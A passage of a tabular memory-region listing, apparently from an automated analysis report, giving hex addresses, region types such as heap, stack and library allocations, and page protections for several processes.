page read and write
|
||
25A14E12000
|
heap
|
page read and write
|
||
1B7ECC18000
|
heap
|
page read and write
|
||
7FFD9AB30000
|
trusted library allocation
|
page read and write
|
||
22AA590D000
|
heap
|
page read and write
|
||
1E0FD0D8000
|
heap
|
page read and write
|
||
142338D1000
|
heap
|
page read and write
|
||
160A43DB000
|
heap
|
page read and write
|
||
194D78E0000
|
heap
|
page read and write
|
||
1B7EC362000
|
heap
|
page read and write
|
||
23C91355000
|
heap
|
page read and write
|
||
F0545FF000
|
stack
|
page read and write
|
||
4F1AAFF000
|
unkown
|
page read and write
|
||
185A548D000
|
trusted library allocation
|
page read and write
|
||
2BAFE1D0000
|
heap
|
page read and write
|
||
1B7EC6EC000
|
heap
|
page read and write
|
||
1CA1E0B0000
|
heap
|
page read and write
|
||
1B7EC6B9000
|
heap
|
page read and write
|
||
1F8A3C90000
|
heap
|
page read and write
|
||
7FFD9AA4C000
|
trusted library allocation
|
page execute and read and write
|
||
4F1ABFF000
|
stack
|
page read and write
|
||
20C32F7C000
|
heap
|
page read and write
|
||
7FFDFAD3E000
|
unkown
|
page execute and read and write
|
||
185BC7A2000
|
heap
|
page read and write
|
||
22AA5A09000
|
heap
|
page read and write
|
||
22AA5A06000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
25A15399000
|
heap
|
page read and write
|
||
26C3DA10000
|
heap
|
page read and write
|
||
7FFD9A9B0000
|
trusted library allocation
|
page read and write
|
||
1B7ED48A000
|
heap
|
page read and write
|
||
25A14BCF000
|
heap
|
page read and write
|
||
25A14AC0000
|
heap
|
page read and write
|
||
1CE8E327000
|
heap
|
page read and write
|
||
251C6AF0000
|
heap
|
page read and write
|
||
A8BB9FF000
|
unkown
|
page read and write
|
||
1E0FD0E0000
|
heap
|
page read and write
|
||
22AA59F6000
|
heap
|
page read and write
|
||
1B7ECD73000
|
heap
|
page read and write
|
||
1BF9D2C5000
|
heap
|
page read and write
|
||
160A43C1000
|
heap
|
page read and write
|
||
1B7ECC19000
|
heap
|
page read and write
|
||
7FFE00462000
|
unkown
|
page execute and read and write
|
||
2AD31830000
|
heap
|
page read and write
|
||
A7A9F2C000
|
stack
|
page read and write
|
||
160A4A09000
|
heap
|
page read and write
|
||
185A5801000
|
trusted library allocation
|
page read and write
|
||
2739F6B0000
|
heap
|
page read and write
|
||
20C32F8B000
|
heap
|
page read and write
|
||
1B7ECC80000
|
heap
|
page read and write
|
||
167DAECB000
|
heap
|
page read and write
|
||
160A443C000
|
heap
|
page read and write
|
||
1CE8C8A0000
|
heap
|
page readonly
|
||
2240CCE5000
|
heap
|
page read and write
|
||
22AA7814000
|
heap
|
page read and write
|
||
160A43F3000
|
heap
|
page read and write
|
||
1CE8FAA2000
|
heap
|
page read and write
|
||
22AA594B000
|
heap
|
page read and write
|
||
1CA300E5000
|
trusted library allocation
|
page read and write
|
||
25A14BA8000
|
heap
|
page read and write
|
||
19D37F44000
|
heap
|
page read and write
|
||
1D807495000
|
heap
|
page read and write
|
||
1B7ECEA5000
|
heap
|
page read and write
|
||
19D3608F000
|
heap
|
page read and write
|
||
160A49FE000
|
heap
|
page read and write
|
||
202AC195000
|
heap
|
page read and write
|
||
1E0FD153000
|
heap
|
page read and write
|
||
1FA18EC9000
|
heap
|
page read and write
|
||
22AA5900000
|
heap
|
page read and write
|
||
1E0FD0D0000
|
heap
|
page read and write
|
||
1B7ECCD9000
|
heap
|
page read and write
|
||
7FFDFF190000
|
unkown
|
page readonly
|
||
1E0FD154000
|
heap
|
page read and write
|
||
1CE8C9AF000
|
heap
|
page read and write
|
||
1BF9D2F1000
|
heap
|
page read and write
|
||
1B7ECDD1000
|
heap
|
page read and write
|
||
13A07140000
|
heap
|
page read and write
|
||
1E0FFED0000
|
direct allocation
|
page read and write
|
||
1FA18E9C000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1B7EC75F000
|
heap
|
page read and write
|
||
25A16D01000
|
heap
|
page read and write
|
||
252A3B40000
|
heap
|
page read and write
|
||
1B7ECE70000
|
heap
|
page read and write
|
||
23C914B0000
|
heap
|
page read and write
|
||
19D36065000
|
heap
|
page read and write
|
||
7FF7E2FB8000
|
unkown
|
page write copy
|
||
7FFDFB1D0000
|
unkown
|
page readonly
|
||
2AD3166A000
|
heap
|
page read and write
|
||
15EDF010000
|
heap
|
page read and write
|
||
1B7ECC66000
|
heap
|
page read and write
|
||
1B7EDDD0000
|
direct allocation
|
page read and write
|
||
160A6283000
|
heap
|
page read and write
|
||
26C3D9F0000
|
heap
|
page read and write
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
1B7ECC79000
|
heap
|
page read and write
|
||
1B7ED964000
|
direct allocation
|
page read and write
|
||
1B7ECCEE000
|
heap
|
page read and write
|
||
2A1D2FE000
|
stack
|
page read and write
|
||
25A14EEE000
|
heap
|
page read and write
|
||
7FFE13344000
|
unkown
|
page read and write
|
||
1B7ECC8A000
|
heap
|
page read and write
|
||
1B7ED994000
|
direct allocation
|
page read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
1BF9D2F9000
|
heap
|
page read and write
|
||
160A6282000
|
heap
|
page read and write
|
||
1F4256B7000
|
heap
|
page read and write
|
||
1B7EDE50000
|
direct allocation
|
page read and write
|
||
1E0FD134000
|
heap
|
page read and write
|
||
1BF9D2C6000
|
heap
|
page read and write
|
||
1CA1E1CA000
|
heap
|
page read and write
|
||
1CE8C9B5000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
1B7EC1B0000
|
direct allocation
|
page read and write
|
||
1CE8FA24000
|
heap
|
page read and write
|
||
1B7ED730000
|
direct allocation
|
page read and write
|
||
161FF260000
|
heap
|
page read and write
|
||
167DAECD000
|
heap
|
page read and write
|
||
1E0FD14E000
|
heap
|
page read and write
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
22F027E000
|
stack
|
page read and write
|
||
1E0FEA14000
|
heap
|
page read and write
|
||
2DF514C0000
|
heap
|
page read and write
|
||
252A3BA8000
|
heap
|
page read and write
|
||
17DDA421000
|
heap
|
page read and write
|
||
25A1539C000
|
heap
|
page read and write
|
||
1B7EC632000
|
heap
|
page read and write
|
||
23C913D2000
|
heap
|
page read and write
|
||
9187AC7000
|
stack
|
page read and write
|
||
160A4460000
|
trusted library allocation
|
page read and write
|
||
1CA1E1D4000
|
heap
|
page read and write
|
||
1B7ECC7B000
|
heap
|
page read and write
|
||
1B7ECC1D000
|
heap
|
page read and write
|
||
1B7EC374000
|
heap
|
page read and write
|
||
17ACFBA7000
|
heap
|
page read and write
|
||
202AC62F000
|
heap
|
page read and write
|
||
7FFE13392000
|
unkown
|
page execute and write copy
|
||
7FF7E2FB8000
|
unkown
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1B7EC6C3000
|
heap
|
page read and write
|
||
17DDA220000
|
heap
|
page read and write
|
||
7FFD9AB50000
|
trusted library allocation
|
page execute and read and write
|
||
160A4368000
|
heap
|
page read and write
|
||
142338E1000
|
heap
|
page read and write
|
||
7FFE148D1000
|
unkown
|
page execute read
|
||
2BAFE0B7000
|
heap
|
page read and write
|
||
1B7ECC24000
|
heap
|
page read and write
|
||
202AC100000
|
trusted library allocation
|
page read and write
|
||
943ACFE000
|
stack
|
page read and write
|
||
1CA38018000
|
heap
|
page read and write
|
||
160A628E000
|
heap
|
page read and write
|
||
167DB060000
|
heap
|
page read and write
|
||
2245E7A0000
|
heap
|
page read and write
|
||
623327F000
|
stack
|
page read and write
|
||
202AC153000
|
heap
|
page read and write
|
||
1F425694000
|
heap
|
page read and write
|
||
160A443A000
|
heap
|
page read and write
|
||
1E0FD0E4000
|
heap
|
page read and write
|
||
2240CCE0000
|
heap
|
page read and write
|
||
D5493FF000
|
unkown
|
page read and write
|
||
1B7ECB36000
|
heap
|
page read and write
|
||
7FFDFACA0000
|
unkown
|
page readonly
|
||
1CE8C97A000
|
heap
|
page read and write
|
||
19A85D79000
|
heap
|
page read and write
|
||
1B7EC3A7000
|
heap
|
page read and write
|
||
185BC4A7000
|
heap
|
page read and write
|
||
22AA5A39000
|
heap
|
page read and write
|
||
1B7ECD17000
|
heap
|
page read and write
|
||
1B7EC6EC000
|
heap
|
page read and write
|
||
1BF9D2ED000
|
heap
|
page read and write
|
||
1F23DF70000
|
heap
|
page read and write
|
||
185B4263000
|
trusted library allocation
|
page read and write
|
||
1B7EC69C000
|
heap
|
page read and write
|
||
955C7DB000
|
stack
|
page read and write
|
||
25A14BC2000
|
heap
|
page read and write
|
||
7FFDFB1D1000
|
unkown
|
page execute and read and write
|
||
1B7EC790000
|
heap
|
page read and write
|
||
309A6FF000
|
unkown
|
page read and write
|
||
1B7EDE20000
|
direct allocation
|
page read and write
|
||
160A49D5000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
25A15387000
|
heap
|
page read and write
|
||
7FFD9AB41000
|
trusted library allocation
|
page read and write
|
||
19D35FF7000
|
heap
|
page read and write
|
||
25A15381000
|
heap
|
page read and write
|
||
2A1D5FF000
|
stack
|
page read and write
|
||
19D3604F000
|
heap
|
page read and write
|
||
20C32F7C000
|
heap
|
page read and write
|
||
202AC1B6000
|
heap
|
page read and write
|
||
22AA5943000
|
heap
|
page read and write
|
||
1FA18EC9000
|
heap
|
page read and write
|
||
1B7ECC84000
|
heap
|
page read and write
|
||
1B7ECEA5000
|
heap
|
page read and write
|
||
6AC8EFC000
|
stack
|
page read and write
|
||
160A4441000
|
heap
|
page read and write
|
||
1B7ECD37000
|
heap
|
page read and write
|
||
1B7EC3D4000
|
heap
|
page read and write
|
||
11C92140000
|
heap
|
page read and write
|
||
19D366AD000
|
heap
|
page read and write
|
||
13A07128000
|
heap
|
page read and write
|
||
1E0FD0EE000
|
heap
|
page read and write
|
||
202AC1B6000
|
heap
|
page read and write
|
||
25A14BD6000
|
heap
|
page read and write
|
||
1B7EC6A4000
|
heap
|
page read and write
|
||
1BF9D2F9000
|
heap
|
page read and write
|
||
14233730000
|
heap
|
page read and write
|
||
25A16D02000
|
heap
|
page read and write
|
||
1CE8F2DD000
|
heap
|
page read and write
|
||
22AA58D0000
|
heap
|
page read and write
|
||
D8CF6FB000
|
stack
|
page read and write
|
||
2BAFE0B8000
|
heap
|
page read and write
|
||
25A14BED000
|
heap
|
page read and write
|
||
7FF7ADE93000
|
unkown
|
page readonly
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
1B7ECDCE000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1B7EC6AE000
|
heap
|
page read and write
|
||
2A1D277000
|
stack
|
page read and write
|
||
25A14BB5000
|
heap
|
page read and write
|
||
1B7EDE40000
|
direct allocation
|
page read and write
|
||
25A14EE0000
|
heap
|
page read and write
|
||
2A1D1FF000
|
stack
|
page read and write
|
||
19D35FFA000
|
heap
|
page read and write
|
||
1B7EDE30000
|
direct allocation
|
page read and write
|
||
41744FF000
|
stack
|
page read and write
|
||
1B7ECE78000
|
heap
|
page read and write
|
||
25A14BDF000
|
heap
|
page read and write
|
||
30AAEFF000
|
stack
|
page read and write
|
||
2BAFE1F1000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
251C6CC0000
|
heap
|
page read and write
|
||
161FF265000
|
heap
|
page read and write
|
||
185A4E84000
|
trusted library allocation
|
page read and write
|
||
17DDA421000
|
heap
|
page read and write
|
||
27A2DFF000
|
unkown
|
page read and write
|
||
1B7ECD26000
|
heap
|
page read and write
|
||
194D7662000
|
heap
|
page read and write
|
||
93700FE000
|
stack
|
page read and write
|
||
1B7EC820000
|
heap
|
page read and write
|
||
1B7EA868000
|
heap
|
page read and write
|
||
202AE02D000
|
heap
|
page read and write
|
||
25A153A9000
|
heap
|
page read and write
|
||
1F23E120000
|
heap
|
page read and write
|
||
1B7EC7AE000
|
heap
|
page read and write
|
||
22CC0F74000
|
heap
|
page read and write
|
||
6EFDFFF000
|
stack
|
page read and write
|
||
7FF7E2FD8000
|
unkown
|
page readonly
|
||
2A1D4FC000
|
stack
|
page read and write
|
||
25A15383000
|
heap
|
page read and write
|
||
19A85CF0000
|
heap
|
page read and write
|
||
22AA5F34000
|
heap
|
page read and write
|
||
6EFDDFF000
|
stack
|
page read and write
|
||
1CA1E208000
|
heap
|
page read and write
|
||
F0140FF000
|
stack
|
page read and write
|
||
7FFD9ACF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9AB80000
|
trusted library allocation
|
page execute and read and write
|
||
1E0FD0DC000
|
heap
|
page read and write
|
||
1CE8FADD000
|
heap
|
page read and write
|
||
25A14B78000
|
heap
|
page read and write
|
||
1B7ECC0B000
|
heap
|
page read and write
|
||
7FFD9AB78000
|
trusted library allocation
|
page read and write
|
||
1D726AE3000
|
heap
|
page read and write
|
||
1D807501000
|
heap
|
page read and write
|
||
28937B10000
|
heap
|
page read and write
|
||
185BCA40000
|
heap
|
page read and write
|
||
252A3BB1000
|
heap
|
page read and write
|
||
202AC195000
|
heap
|
page read and write
|
||
25A16D03000
|
heap
|
page read and write
|
||
6AC8B9F000
|
stack
|
page read and write
|
||
19D36077000
|
heap
|
page read and write
|
||
20C32E60000
|
heap
|
page read and write
|
||
2A1D77C000
|
stack
|
page read and write
|
||
83001EF000
|
stack
|
page read and write
|
||
7FFE14646000
|
unkown
|
page execute and read and write
|
||
1D726AF3000
|
heap
|
page read and write
|
||
185A2685000
|
heap
|
page read and write
|
||
2A1D0FF000
|
stack
|
page read and write
|
||
6232F1E000
|
stack
|
page read and write
|
||
1EAC1D11000
|
heap
|
page read and write
|
||
7FFD9AC30000
|
trusted library allocation
|
page read and write
|
||
194D761A000
|
heap
|
page read and write
|
||
8210DCF000
|
stack
|
page read and write
|
||
1CE8FB28000
|
heap
|
page read and write
|
||
1B7EDE12000
|
heap
|
page read and write
|
||
1E0FD11B000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
1B7EC331000
|
heap
|
page read and write
|
||
22AA59B7000
|
heap
|
page read and write
|
||
7FFD9A9BB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9AAB0000
|
trusted library allocation
|
page execute and read and write
|
||
19D3669E000
|
heap
|
page read and write
|
||
7FFDFB7D4000
|
unkown
|
page execute and read and write
|
||
22F01FF000
|
stack
|
page read and write
|
||
22AA5942000
|
heap
|
page read and write
|
||
1BF9D2F4000
|
heap
|
page read and write
|
||
1FA18E10000
|
heap
|
page read and write
|
||
1CA7B230000
|
heap
|
page read and write
|
||
1CE8C938000
|
heap
|
page read and write
|
||
161FEF61000
|
heap
|
page read and write
|
||
7FFD9ACC0000
|
trusted library allocation
|
page read and write
|
||
7FF7ADE8F000
|
unkown
|
page read and write
|
||
202AE026000
|
heap
|
page read and write
|
||
1B7ED47F000
|
heap
|
page read and write
|
||
161FEF20000
|
heap
|
page read and write
|
||
1B7EC317000
|
heap
|
page read and write
|
||
1E080570000
|
direct allocation
|
page read and write
|
||
19A86010000
|
heap
|
page read and write
|
||
C50ACD8000
|
stack
|
page read and write
|
||
185A3FF6000
|
trusted library allocation
|
page read and write
|
||
19D366AD000
|
heap
|
page read and write
|
||
1B7ED630000
|
direct allocation
|
page read and write
|
||
1B7ECC7E000
|
heap
|
page read and write
|
||
1BF9D2A0000
|
heap
|
page read and write
|
||
7FFDFAC8F000
|
unkown
|
page execute and read and write
|
||
19A86020000
|
heap
|
page read and write
|
||
160A443C000
|
heap
|
page read and write
|
||
1FBE38C0000
|
heap
|
page read and write
|
||
59CADFC000
|
stack
|
page read and write
|
||
1B7ECD2C000
|
heap
|
page read and write
|
||
1B7EDE2C000
|
heap
|
page read and write
|
||
18A401B0000
|
heap
|
page read and write
|
||
7FFE1323C000
|
unkown
|
page execute and read and write
|
||
1E0FD11B000
|
heap
|
page read and write
|
||
1CE8C97A000
|
heap
|
page read and write
|
||
2BAFE060000
|
heap
|
page read and write
|
||
7FFD9AC40000
|
trusted library allocation
|
page read and write
|
||
1CA1FDF1000
|
trusted library allocation
|
page read and write
|
||
1B7ECE16000
|
heap
|
page read and write
|
||
F013FFF000
|
unkown
|
page read and write
|
||
22E56898000
|
heap
|
page read and write
|
||
1B7EC34C000
|
heap
|
page read and write
|
||
160A43C3000
|
heap
|
page read and write
|
||
252A3B90000
|
heap
|
page read and write
|
||
202AC198000
|
heap
|
page read and write
|
||
50387A7000
|
stack
|
page read and write
|
||
1B7ED0B4000
|
heap
|
page read and write
|
||
1B7ECDF4000
|
heap
|
page read and write
|
||
1FA18E9C000
|
heap
|
page read and write
|
||
7FFD9A9B4000
|
trusted library allocation
|
page read and write
|
||
160A4435000
|
heap
|
page read and write
|
||
1B7ED26F000
|
heap
|
page read and write
|
||
1B7ECD08000
|
heap
|
page read and write
|
||
18A40261000
|
heap
|
page read and write
|
||
160A43B6000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
2BAFE0A5000
|
heap
|
page read and write
|
||
6AC9ECD000
|
stack
|
page read and write
|
||
22AA5A01000
|
heap
|
page read and write
|
||
25A15370000
|
heap
|
page read and write
|
||
2739F737000
|
heap
|
page read and write
|
||
1CE8EAC2000
|
heap
|
page read and write
|
||
160A6280000
|
heap
|
page read and write
|
||
17DDA400000
|
heap
|
page read and write
|
||
25A14BB0000
|
heap
|
page read and write
|
||
202AC191000
|
heap
|
page read and write
|
||
22AA5F3C000
|
heap
|
page read and write
|
||
20C32F7C000
|
heap
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
160A49DA000
|
heap
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
2245EA60000
|
heap
|
page read and write
|
||
1B7ECE8F000
|
heap
|
page read and write
|
||
1CE8C959000
|
heap
|
page read and write
|
||
17ACFBA9000
|
heap
|
page read and write
|
||
1CA1FDE0000
|
heap
|
page execute and read and write
|
||
1B7EA7F0000
|
heap
|
page read and write
|
||
1F521690000
|
heap
|
page read and write
|
||
1CA1E19E000
|
heap
|
page read and write
|
||
22AA5944000
|
heap
|
page read and write
|
||
A458FF000
|
stack
|
page read and write
|
||
1CE8FAED000
|
heap
|
page read and write
|
||
7FFD9AC30000
|
trusted library allocation
|
page read and write
|
||
202AC198000
|
heap
|
page read and write
|
||
1CE8FAC9000
|
heap
|
page read and write
|
||
1CE8FA48000
|
heap
|
page read and write
|
||
1E0FE9B0000
|
direct allocation
|
page read and write
|
||
7FFE148D0000
|
unkown
|
page readonly
|
||
1B7EC75A000
|
heap
|
page read and write
|
||
1B7EC6C3000
|
heap
|
page read and write
|
||
1E0806F0000
|
direct allocation
|
page read and write
|
||
19D36074000
|
heap
|
page read and write
|
||
202AC733000
|
heap
|
page read and write
|
||
22AA7824000
|
heap
|
page read and write
|
||
1CA7B130000
|
heap
|
page read and write
|
||
1BF9D2ED000
|
heap
|
page read and write
|
||
1B7ECD13000
|
heap
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
6E33E7F000
|
stack
|
page read and write
|
||
1CE8F4DD000
|
heap
|
page read and write
|
||
1B7ECC32000
|
heap
|
page read and write
|
||
1B7ECD1D000
|
heap
|
page read and write
|
||
19D36065000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
290E5A40000
|
heap
|
page read and write
|
||
19D37F36000
|
heap
|
page read and write
|
||
202AC1B5000
|
heap
|
page read and write
|
||
7FFE1A470000
|
unkown
|
page readonly
|
||
7FFE11510000
|
unkown
|
page readonly
|
||
20C32D50000
|
heap
|
page read and write
|
||
1CE8CA2B000
|
heap
|
page read and write
|
||
1CE8CA1F000
|
heap
|
page read and write
|
||
7FFE1A45C000
|
unkown
|
page read and write
|
||
7FFE148C8000
|
unkown
|
page read and write
|
||
1B7ECDF0000
|
heap
|
page read and write
|
||
185BC670000
|
heap
|
page read and write
|
||
1B7ECDDC000
|
heap
|
page read and write
|
||
252A3BB1000
|
heap
|
page read and write
|
||
1CE8FAED000
|
heap
|
page read and write
|
||
20ED9470000
|
heap
|
page read and write
|
||
7FFD9AA50000
|
trusted library allocation
|
page execute and read and write
|
||
13A07220000
|
heap
|
page read and write
|
||
1B7ED031000
|
heap
|
page read and write
|
||
1B7EC7CE000
|
heap
|
page read and write
|
||
202AE020000
|
heap
|
page read and write
|
||
1B7ECDCD000
|
heap
|
page read and write
|
||
1B7EC1C0000
|
direct allocation
|
page read and write
|
||
25A14BC2000
|
heap
|
page read and write
|
||
202AC1B3000
|
heap
|
page read and write
|
||
9187BCE000
|
stack
|
page read and write
|
||
1B7ECB53000
|
heap
|
page read and write
|
||
25A14E1A000
|
heap
|
page read and write
|
||
25A14BC4000
|
heap
|
page read and write
|
||
25A14BC4000
|
heap
|
page read and write
|
||
7FFD9ABF0000
|
trusted library allocation
|
page read and write
|
||
1CE8FAF5000
|
heap
|
page read and write
|
||
202AC198000
|
heap
|
page read and write
|
||
1E0FD0CD000
|
heap
|
page read and write
|
||
19D35FF4000
|
heap
|
page read and write
|
||
25A14E1A000
|
heap
|
page read and write
|
||
25A14BE8000
|
heap
|
page read and write
|
||
22AA5930000
|
trusted library allocation
|
page read and write
|
||
25A14B00000
|
trusted library allocation
|
page read and write
|
||
7FFD9ACA0000
|
trusted library allocation
|
page read and write
|
||
202AC100000
|
trusted library allocation
|
page read and write
|
||
7FFDFAC32000
|
unkown
|
page execute and read and write
|
||
268F4D60000
|
heap
|
page read and write
|
||
194D7520000
|
heap
|
page read and write
|
||
7FFDFAB81000
|
unkown
|
page execute and read and write
|
||
22AA5F49000
|
heap
|
page read and write
|
||
19D36061000
|
heap
|
page read and write
|
||
1B7EC759000
|
heap
|
page read and write
|
||
1B7ECDDB000
|
heap
|
page read and write
|
||
1B7ECDF9000
|
heap
|
page read and write
|
||
1B7ECD28000
|
heap
|
page read and write
|
||
25A14E1E000
|
heap
|
page read and write
|
||
1B7ECCE9000
|
heap
|
page read and write
|
||
290E5A50000
|
heap
|
page read and write
|
||
6AC8FFF000
|
stack
|
page read and write
|
||
268F4E70000
|
heap
|
page read and write
|
||
C50B17F000
|
stack
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
22AA59FB000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
7E8ACFF000
|
unkown
|
page read and write
|
||
1F4256B7000
|
heap
|
page read and write
|
||
160A4396000
|
heap
|
page read and write
|
||
22AA5F4C000
|
heap
|
page read and write
|
||
1B7ECD39000
|
heap
|
page read and write
|
||
7FFE148B1000
|
unkown
|
page execute and read and write
|
||
19D366AD000
|
heap
|
page read and write
|
||
2739F6C0000
|
heap
|
page read and write
|
||
1B7ECCBE000
|
heap
|
page read and write
|
||
1B7ECC7B000
|
heap
|
page read and write
|
||
7FFD9ADC0000
|
trusted library allocation
|
page execute and read and write
|
||
1CA37FE4000
|
heap
|
page read and write
|
||
22CC0EE0000
|
heap
|
page read and write
|
||
1B7ECD49000
|
heap
|
page read and write
|
||
7FFDFB7DE000
|
unkown
|
page execute and read and write
|
||
6AC907E000
|
stack
|
page read and write
|
||
1CE8C8B0000
|
heap
|
page read and write
|
||
194D7662000
|
heap
|
page read and write
|
||
1D726AF3000
|
heap
|
page read and write
|
||
1CE8FAB2000
|
heap
|
page read and write
|
||
C53EEFF000
|
stack
|
page read and write
|
||
3184EFF000
|
stack
|
page read and write
|
||
1B7ECDED000
|
heap
|
page read and write
|
||
1B7ECC7B000
|
heap
|
page read and write
|
||
160A49F4000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
2A1D57E000
|
stack
|
page read and write
|
||
1B7EC35F000
|
heap
|
page read and write
|
||
160A628D000
|
heap
|
page read and write
|
||
185A2460000
|
heap
|
page read and write
|
||
1B7ECD3F000
|
heap
|
page read and write
|
||
202AC1AA000
|
heap
|
page read and write
|
||
185BC80D000
|
heap
|
page read and write
|
||
161FF110000
|
heap
|
page read and write
|
||
1E080682000
|
direct allocation
|
page read and write
|
||
1E0FD140000
|
heap
|
page read and write
|
||
25A14BD3000
|
heap
|
page read and write
|
||
19D35FD0000
|
trusted library allocation
|
page read and write
|
||
25A1537E000
|
heap
|
page read and write
|
||
22AA59EE000
|
heap
|
page read and write
|
||
185A24A0000
|
heap
|
page read and write
|
||
22AA5A37000
|
heap
|
page read and write
|
||
1B7ECC08000
|
heap
|
page read and write
|
||
35801FF000
|
stack
|
page read and write
|
||
185A2593000
|
heap
|
page read and write
|
||
1B7ECE78000
|
heap
|
page read and write
|
||
1B7EC73A000
|
heap
|
page read and write
|
||
7FFD9ABA0000
|
trusted library allocation
|
page read and write
|
||
7DF4D42E0000
|
trusted library allocation
|
page execute and read and write
|
||
251C6CA0000
|
heap
|
page read and write
|
||
1B7ECD3F000
|
heap
|
page read and write
|
||
7FFD9A990000
|
trusted library allocation
|
page read and write
|
||
160A444B000
|
heap
|
page read and write
|
||
160A49F2000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
1B7EC82A000
|
heap
|
page read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
1E08071D000
|
direct allocation
|
page read and write
|
||
1B7EC7AE000
|
heap
|
page read and write
|
||
1E0FE937000
|
direct allocation
|
page read and write
|
||
25A16D14000
|
heap
|
page read and write
|
||
1B7ECD24000
|
heap
|
page read and write
|
||
7FFE126F1000
|
unkown
|
page execute and write copy
|
||
2245EA50000
|
heap
|
page read and write
|
||
202AC638000
|
heap
|
page read and write
|
||
1B7ECC61000
|
heap
|
page read and write
|
||
160A49F5000
|
heap
|
page read and write
|
||
6AC9177000
|
stack
|
page read and write
|
||
202AC617000
|
heap
|
page read and write
|
||
1CE8FB27000
|
heap
|
page read and write
|
||
1EAC1C80000
|
heap
|
page read and write
|
||
1B7ECC84000
|
heap
|
page read and write
|
||
1B7EC38A000
|
heap
|
page read and write
|
||
20ED9391000
|
heap
|
page read and write
|
||
19D36048000
|
heap
|
page read and write
|
||
25A14EEB000
|
heap
|
page read and write
|
||
202AC195000
|
heap
|
page read and write
|
||
3F8B4FF000
|
stack
|
page read and write
|
||
160A43BE000
|
heap
|
page read and write
|
||
26C3D9D0000
|
heap
|
page read and write
|
||
26C3DA10000
|
heap
|
page read and write
|
||
1B7ECF13000
|
heap
|
page read and write
|
||
1FBE3800000
|
heap
|
page read and write
|
||
1CE8FADD000
|
heap
|
page read and write
|
||
1E0FD0CD000
|
heap
|
page read and write
|
||
160A4A0A000
|
heap
|
page read and write
|
||
1CE8FA91000
|
heap
|
page read and write
|
||
25A14BB0000
|
heap
|
page read and write
|
||
1B7ECCE4000
|
heap
|
page read and write
|
||
1B7ED377000
|
heap
|
page read and write
|
||
1B7ECC82000
|
heap
|
page read and write
|
||
202AC182000
|
heap
|
page read and write
|
||
1B7ECC7E000
|
heap
|
page read and write
|
||
1CE8E234000
|
heap
|
page read and write
|
||
160A4398000
|
heap
|
page read and write
|
||
1B7ECD95000
|
heap
|
page read and write
|
||
19D35FF0000
|
heap
|
page read and write
|
||
1FA18E8E000
|
heap
|
page read and write
|
||
22AA594E000
|
heap
|
page read and write
|
||
8210D4F000
|
stack
|
page read and write
|
||
22AA5F59000
|
heap
|
page read and write
|
||
1B7ED9E8000
|
direct allocation
|
page read and write
|
||
837EFCE000
|
stack
|
page read and write
|
||
1B7ECC8A000
|
heap
|
page read and write
|
||
1B7ECDED000
|
heap
|
page read and write
|
||
1CE8F5C5000
|
heap
|
page read and write
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
1B7EC35B000
|
heap
|
page read and write
|
||
2240CA31000
|
heap
|
page read and write
|
||
1BF9D2FD000
|
heap
|
page read and write
|
||
1B7ECDA0000
|
heap
|
page read and write
|
||
1B7ECCD9000
|
heap
|
page read and write
|
||
F013EFB000
|
stack
|
page read and write
|
||
1B7EE020000
|
direct allocation
|
page read and write
|
||
1B7ECDE0000
|
heap
|
page read and write
|
||
6AC91FA000
|
stack
|
page read and write
|
||
7FFE148C5000
|
unkown
|
page execute and read and write
|
||
1B7ECCD9000
|
heap
|
page read and write
|
||
25A16D14000
|
heap
|
page read and write
|
||
7FF7ADE50000
|
unkown
|
page readonly
|
||
1B7EC6C5000
|
heap
|
page read and write
|
||
1B7EC6A4000
|
heap
|
page read and write
|
||
9187F7F000
|
stack
|
page read and write
|
||
25A15388000
|
heap
|
page read and write
|
||
22CC1215000
|
heap
|
page read and write
|
||
1E080680000
|
direct allocation
|
page read and write
|
||
13A07300000
|
heap
|
page read and write
|
||
D6CC2FF000
|
stack
|
page read and write
|
||
1E0805B0000
|
direct allocation
|
page read and write
|
||
11C92130000
|
heap
|
page read and write
|
||
1B7EDE00000
|
direct allocation
|
page read and write
|
||
160A43A1000
|
heap
|
page read and write
|
||
25A14BB2000
|
heap
|
page read and write
|
||
1B7ECF55000
|
heap
|
page read and write
|
||
1E080590000
|
direct allocation
|
page read and write
|
||
1B7ECE41000
|
heap
|
page read and write
|
||
1B7ECEB5000
|
heap
|
page read and write
|
||
194D7440000
|
heap
|
page read and write
|
||
160A43BB000
|
heap
|
page read and write
|
||
1CA1E210000
|
heap
|
page read and write
|
||
1B7ECC43000
|
heap
|
page read and write
|
||
259EB5E000
|
stack
|
page read and write
|
||
1E0FD11F000
|
heap
|
page read and write
|
||
2DF513C1000
|
heap
|
page read and write
|
||
19D35FF2000
|
heap
|
page read and write
|
||
1D726ADF000
|
heap
|
page read and write
|
||
1B7ECF51000
|
heap
|
page read and write
|
||
1B7EC1C0000
|
direct allocation
|
